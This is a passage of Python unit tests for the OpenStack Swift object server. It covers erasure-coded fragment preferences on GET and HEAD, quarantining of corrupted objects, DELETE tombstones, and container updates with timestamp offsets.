frag_index = int(resp.headers['X-Object-Sysmeta-Ec-Frag-Index'])
self.assertEqual(resp.body, frags[frag_index])
def _create_ondisk_fragments(self, policy):
# Create some on disk files...
ts_iter = make_timestamp_iter()
# PUT at ts_0
ts_0 = next(ts_iter)
body = 'OLDER'
headers = {'X-Timestamp': ts_0.internal,
'Content-Length': '5',
'Content-Type': 'application/octet-stream',
'X-Backend-Storage-Policy-Index': int(policy)}
if policy.policy_type == EC_POLICY:
body = encode_frag_archive_bodies(policy, body)[0]
headers.update({
'X-Object-Sysmeta-Ec-Frag-Index': '0',
'Content-Length': len(body),
})
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = body
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# POST at ts_1
ts_1 = next(ts_iter)
headers = {'X-Timestamp': ts_1.internal,
'X-Backend-Storage-Policy-Index': int(policy)}
headers['X-Object-Meta-Test'] = 'abc'
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers=headers)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
# PUT again at ts_2 but without making the data file durable
ts_2 = next(ts_iter)
body = 'NEWER'
headers = {'X-Timestamp': ts_2.internal,
'Content-Length': '5',
'Content-Type': 'application/octet-stream',
'X-Backend-Storage-Policy-Index': int(policy)}
if policy.policy_type == EC_POLICY:
body = encode_frag_archive_bodies(policy, body)[2]
headers.update({
'X-Object-Sysmeta-Ec-Frag-Index': '2',
'Content-Length': len(body),
})
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = body
# patch the commit method to do nothing so EC object is non-durable
with mock.patch('swift.obj.diskfile.ECDiskFileWriter.commit'):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
return ts_0, ts_1, ts_2
def test_GET_HEAD_with_fragment_preferences(self):
for policy in POLICIES:
ts_0, ts_1, ts_2 = self._create_ondisk_fragments(policy)
backend_frags = {ts_0.internal: [0], ts_2.internal: [2]}
def _assert_frag_0_at_ts_0(resp):
expect = {
'X-Timestamp': ts_1.normal,
'X-Backend-Timestamp': ts_1.internal,
'X-Backend-Data-Timestamp': ts_0.internal,
'X-Backend-Durable-Timestamp': ts_0.internal,
'X-Object-Sysmeta-Ec-Frag-Index': '0',
'X-Object-Meta-Test': 'abc'}
self.assertDictContainsSubset(expect, resp.headers)
self.assertEqual(backend_frags, json.loads(
resp.headers['X-Backend-Fragments']))
def _assert_repl_data_at_ts_2():
self.assertIn(resp.status_int, (200, 202))
expect = {
'X-Timestamp': ts_2.normal,
'X-Backend-Timestamp': ts_2.internal,
'X-Backend-Data-Timestamp': ts_2.internal,
'X-Backend-Durable-Timestamp': ts_2.internal}
self.assertDictContainsSubset(expect, resp.headers)
self.assertNotIn('X-Object-Meta-Test', resp.headers)
# Sanity check: Request with no preferences should default to the
# durable frag
headers = {'X-Backend-Storage-Policy-Index': int(policy)}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_0_at_ts_0(resp)
self.assertECBodyEqual(resp, 'OLDER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
if policy.policy_type == EC_POLICY:
_assert_frag_0_at_ts_0(resp)
else:
_assert_repl_data_at_ts_2()
# Request with preferences can select the older frag
prefs = json.dumps(
[{'timestamp': ts_0.internal, 'exclude': [1, 3]}])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_0_at_ts_0(resp)
self.assertECBodyEqual(resp, 'OLDER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_0_at_ts_0(resp)
else:
_assert_repl_data_at_ts_2()
def _assert_frag_2_at_ts_2(resp):
self.assertIn(resp.status_int, (200, 202))
# do not expect meta file to be included since it is older
expect = {
'X-Timestamp': ts_2.normal,
'X-Backend-Timestamp': ts_2.internal,
'X-Backend-Data-Timestamp': ts_2.internal,
'X-Backend-Durable-Timestamp': ts_0.internal,
'X-Object-Sysmeta-Ec-Frag-Index': '2'}
self.assertDictContainsSubset(expect, resp.headers)
self.assertEqual(backend_frags, json.loads(
resp.headers['X-Backend-Fragments']))
self.assertNotIn('X-Object-Meta-Test', resp.headers)
# Request with preferences can select the newer non-durable frag
prefs = json.dumps(
[{'timestamp': ts_2.internal, 'exclude': [1, 3]}])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
self.assertECBodyEqual(resp, 'NEWER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
else:
_assert_repl_data_at_ts_2()
# Request with preference for ts_0 but excludes index 0 will
# default to newest frag
prefs = json.dumps(
[{'timestamp': ts_0.internal, 'exclude': [0]}])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
self.assertECBodyEqual(resp, 'NEWER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
else:
_assert_repl_data_at_ts_2()
# Request with preferences that exclude all frags get nothing
prefs = json.dumps(
[{'timestamp': ts_0.internal, 'exclude': [0]},
{'timestamp': ts_2.internal, 'exclude': [2]}])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
self.assertEqual(resp.status_int, 404)
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
self.assertEqual(resp.status_int, 404)
else:
_assert_repl_data_at_ts_2()
# Request with empty preferences will get non-durable
prefs = json.dumps([])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
self.assertECBodyEqual(resp, 'NEWER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
else:
_assert_repl_data_at_ts_2()
def test_GET_quarantine(self):
# Test swift.obj.server.ObjectController.GET
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
policy=POLICIES.legacy)
disk_file.open()
file_name = os.path.basename(disk_file._data_file)
etag = md5()
etag.update('VERIF')
etag = etag.hexdigest()
metadata = {'X-Timestamp': timestamp, 'name': '/a/c/o',
'Content-Length': 6, 'ETag': etag}
diskfile.write_metadata(disk_file._fp, metadata)
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(disk_file._data_file)))
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
body = resp.body # actually does quarantining
self.assertEqual(body, 'VERIFY')
self.assertEqual(os.listdir(quar_dir)[0], file_name)
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
def test_GET_quarantine_zbyte(self):
# Test swift.obj.server.ObjectController.GET
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
policy=POLICIES.legacy)
disk_file.open()
file_name = os.path.basename(disk_file._data_file)
with open(disk_file._data_file) as fp:
metadata = diskfile.read_metadata(fp)
os.unlink(disk_file._data_file)
with open(disk_file._data_file, 'w') as fp:
diskfile.write_metadata(fp, metadata)
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(disk_file._data_file)))
self.assertEqual(os.listdir(quar_dir)[0], file_name)
def test_GET_quarantine_range(self):
# Test swift.obj.server.ObjectController.GET
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
policy=POLICIES.legacy)
disk_file.open()
file_name = os.path.basename(disk_file._data_file)
etag = md5()
etag.update('VERIF')
etag = etag.hexdigest()
metadata = {'X-Timestamp': timestamp, 'name': '/a/c/o',
'Content-Length': 6, 'ETag': etag}
diskfile.write_metadata(disk_file._fp, metadata)
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
req = Request.blank('/sda1/p/a/c/o')
req.range = 'bytes=0-4' # partial
resp = req.get_response(self.object_controller)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(disk_file._data_file)))
resp.body
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
self.assertFalse(os.path.isdir(quar_dir))
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
req = Request.blank('/sda1/p/a/c/o')
req.range = 'bytes=1-6' # partial
resp = req.get_response(self.object_controller)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(disk_file._data_file)))
resp.body
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
self.assertFalse(os.path.isdir(quar_dir))
req = Request.blank('/sda1/p/a/c/o')
req.range = 'bytes=0-14' # full
resp = req.get_response(self.object_controller)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(disk_file._data_file)))
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
resp.body
self.assertTrue(os.path.isdir(quar_dir))
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
@mock.patch("time.time", mock_time)
def test_DELETE(self):
# Test swift.obj.server.ObjectController.DELETE
req = Request.blank('/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
# The following should have created a tombstone file
timestamp = normalize_timestamp(1000)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
ts_1000_file = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertTrue(os.path.isfile(ts_1000_file))
# There should now be a 1000 ts file.
self.assertEqual(len(os.listdir(os.path.dirname(ts_1000_file))), 1)
# The following should *not* have created a tombstone file.
timestamp = normalize_timestamp(999)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
ts_999_file = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertFalse(os.path.isfile(ts_999_file))
self.assertTrue(os.path.isfile(ts_1000_file))
self.assertEqual(len(os.listdir(os.path.dirname(ts_1000_file))), 1)
orig_timestamp = utils.Timestamp(1002).internal
headers = {'X-Timestamp': orig_timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'}
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# There should now be 1000 ts and a 1001 data file.
data_1002_file = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
orig_timestamp + '.data')
self.assertTrue(os.path.isfile(data_1002_file))
self.assertEqual(len(os.listdir(os.path.dirname(data_1002_file))), 1)
# The following should *not* have created a tombstone file.
timestamp = normalize_timestamp(1001)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
ts_1001_file = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertFalse(os.path.isfile(ts_1001_file))
self.assertTrue(os.path.isfile(data_1002_file))
self.assertEqual(len(os.listdir(os.path.dirname(ts_1001_file))), 1)
timestamp = normalize_timestamp(1003)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
ts_1003_file = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertTrue(os.path.isfile(ts_1003_file))
self.assertEqual(len(os.listdir(os.path.dirname(ts_1003_file))), 1)
def test_DELETE_bad_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': 'bad'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_DELETE_succeeds_with_later_POST(self):
t_put = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': t_put,
'Content-Length': 0,
'Content-Type': 'plain/text'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
t_delete = next(self.ts).internal
t_post = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t_post})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': t_delete},
)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
obj_dir = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')))
ts_file = os.path.join(obj_dir, t_delete + '.ts')
self.assertTrue(os.path.isfile(ts_file))
meta_file = os.path.join(obj_dir, t_post + '.meta')
self.assertTrue(os.path.isfile(meta_file))
def test_DELETE_container_updates(self):
# Test swift.obj.server.ObjectController.DELETE and container
# updates, making sure container update is called in the correct
# state.
start = time()
orig_timestamp = utils.Timestamp(start)
headers = {'X-Timestamp': orig_timestamp.internal,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'}
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
calls_made = [0]
def our_container_update(*args, **kwargs):
calls_made[0] += 1
orig_cu = self.object_controller.container_update
self.object_controller.container_update = our_container_update
try:
# The following request should return 409 (HTTP Conflict). A
# tombstone file should not have been created with this timestamp.
timestamp = utils.Timestamp(start - 0.00001)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp.internal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['x-backend-timestamp'],
orig_timestamp.internal)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertFalse(os.path.isfile(objfile))
self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
self.assertEqual(0, calls_made[0])
# The following request should return 204, and the object should
# be truly deleted (container update is performed) because this
# timestamp is newer. A tombstone file should have been created
# with this timestamp.
timestamp = utils.Timestamp(start + 0.00001)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp.internal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(1, calls_made[0])
self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
# The following request should return a 404, as the object should
# already have been deleted, but it should have also performed a
# container update because the timestamp is newer, and a tombstone
# file should also exist with this timestamp.
timestamp = utils.Timestamp(start + 0.00002)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp.internal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(2, calls_made[0])
self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
# The following request should return a 404, as the object should
# already have been deleted, and it should not have performed a
# container update because the timestamp is older, or created a
# tombstone file with this timestamp.
timestamp = utils.Timestamp(start + 0.00001)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp.internal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertFalse(os.path.isfile(objfile))
self.assertEqual(2, calls_made[0])
self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
finally:
self.object_controller.container_update = orig_cu
def test_DELETE_full_drive(self):
def mock_diskfile_delete(self, timestamp):
raise DiskFileNoSpace()
t_put = utils.Timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': t_put.internal,
'Content-Length': 0,
'Content-Type': 'plain/text'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
with mock.patch('swift.obj.diskfile.BaseDiskFile.delete',
mock_diskfile_delete):
t_delete = utils.Timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': t_delete.internal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
def test_object_update_with_offset(self):
container_updates = []
def capture_updates(ip, port, method, path, headers, *args, **kwargs):
container_updates.append((ip, port, method, path, headers))
# create a new object
create_timestamp = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o', method='PUT', body='test1',
headers={'X-Timestamp': create_timestamp,
'X-Container-Host': '10.0.0.1:8080',
'X-Container-Device': 'sda1',
'X-Container-Partition': 'p',
'Content-Type': 'text/plain'})
with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(1, len(container_updates))
for update in container_updates:
ip, port, method, path, headers = update
self.assertEqual(ip, '10.0.0.1')
self.assertEqual(port, '8080')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/sda1/p/a/c/o')
expected = {
'X-Size': len('test1'),
'X-Etag': md5('test1').hexdigest(),
'X-Content-Type': 'text/plain',
'X-Timestamp': create_timestamp,
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
container_updates = [] # reset
# read back object
req = Request.blank('/sda1/p/a/c/o', method='GET')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['X-Timestamp'],
utils.Timestamp(create_timestamp).normal)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
create_timestamp)
self.assertEqual(resp.body, 'test1')
# send an update with an offset
offset_timestamp = utils.Timestamp(
create_timestamp, offset=1).internal
req = Request.blank('/sda1/p/a/c/o', method='PUT', body='test2',
headers={'X-Timestamp': offset_timestamp,
'X-Container-Host': '10.0.0.1:8080',
'X-Container-Device': 'sda1',
'X-Container-Partition': 'p',
'Content-Type': 'text/html'})
with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(1, len(container_updates))
for update in container_updates:
ip, port, method, path, headers = update
self.assertEqual(ip, '10.0.0.1')
self.assertEqual(port, '8080')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/sda1/p/a/c/o')
expected = {
'X-Size': len('test2'),
'X-Etag': md5('test2').hexdigest(),
'X-Content-Type': 'text/html',
'X-Timestamp': offset_timestamp,
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
container_updates = [] # reset
# read back new offset
req = Request.blank('/sda1/p/a/c/o', method='GET')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['X-Timestamp'],
utils.Timestamp(offset_timestamp).normal)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
offset_timestamp)
self.assertEqual(resp.body, 'test2')
# now overwrite with a newer time
overwrite_timestamp = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o', method='PUT', body='test3',
headers={'X-Timestamp': overwrite_timestamp,
'X-Container-Host': '10.0.0.1:8080',
'X-Container-Device': 'sda1',
'X-Container-Partition': 'p',
'Content-Type': 'text/enriched'})
with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(1, len(container_updates))
for update in container_updates:
ip, port, method, path, headers = update
self.assertEqual(ip, '10.0.0.1')
self.assertEqual(port, '8080')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/sda1/p/a/c/o')
expected = {
'X-Size': len('test3'),
'X-Etag': md5('test3').hexdigest(),
'X-Content-Type': 'text/enriched',
'X-Timestamp': overwrite_timestamp,
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
container_updates = [] # reset
# read back overwrite
req = Request.blank('/sda1/p/a/c/o', method='GET')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['X-Timestamp'],
utils.Timestamp(overwrite_timestamp).normal)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
overwrite_timestamp)
self.assertEqual(resp.body, 'test3')
# delete with an offset
offset_delete = utils.Timestamp(overwrite_timestamp,
offset=1).internal
req = Request.blank('/sda1/p/a/c/o', method='DELETE',
headers={'X-Timestamp': offset_delete,
'X-Container-Host': '10.0.0.1:8080',
'X-Container-Device': 'sda1',
'X-Container-Partition': 'p'})
with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 204)
self.assertEqual(1, len(container_updates))
for update in container_updates:
ip, port, method, path, headers = update
self.assertEqual(ip, '10.0.0.1')
self.assertEqual(port, '8080')
self.assertEqual(method, 'DELETE')
self.assertEqual(path, '/sda1/p/a/c/o')
expected = {
'X-Timestamp': offset_delete,
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
container_updates = [] # reset
# read back offset delete
req = Request.blank('/sda1/p/a/c/o', method='GET')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Timestamp'], None)
self.assertEqual(resp.headers['X-Backend-Timestamp'], offset_delete)
# and one more delete with a newer timestamp
delete_timestamp = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o', method='DELETE',
headers={'X-Timestamp': delete_timestamp,
'X-Container-Host': '10.0.0.1:8080',
'X-Container-Device': 'sda1',
'X-Container-Partition': 'p'})
with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 404)
self.assertEqual(1, len(container_updates))
for update in container_updates:
ip, port, method, path, headers = update
self.assertEqual(ip, '10.0.0.1')
self.assertEqual(port, '8080')
self.assertEqual(method, 'DELETE')
self.assertEqual(path, '/sda1/p/a/c/o')
expected = {
'X-Timestamp': delete_timestamp,
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
container_updates = [] # reset
# read back delete
req = Request.blank('/sda1/p/a/c/o', method='GET')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Timestamp'], None)
self.assertEqual(resp.headers['X-Backend-Timestamp'], delete_timestamp)
def test_call_bad_request(self):
# Test swift.obj.server.ObjectController.__call__
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': 'PUT',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '400 ')
def test_call_not_found(self):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': 'GET',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '404 ')
def test_call_bad_method(self):
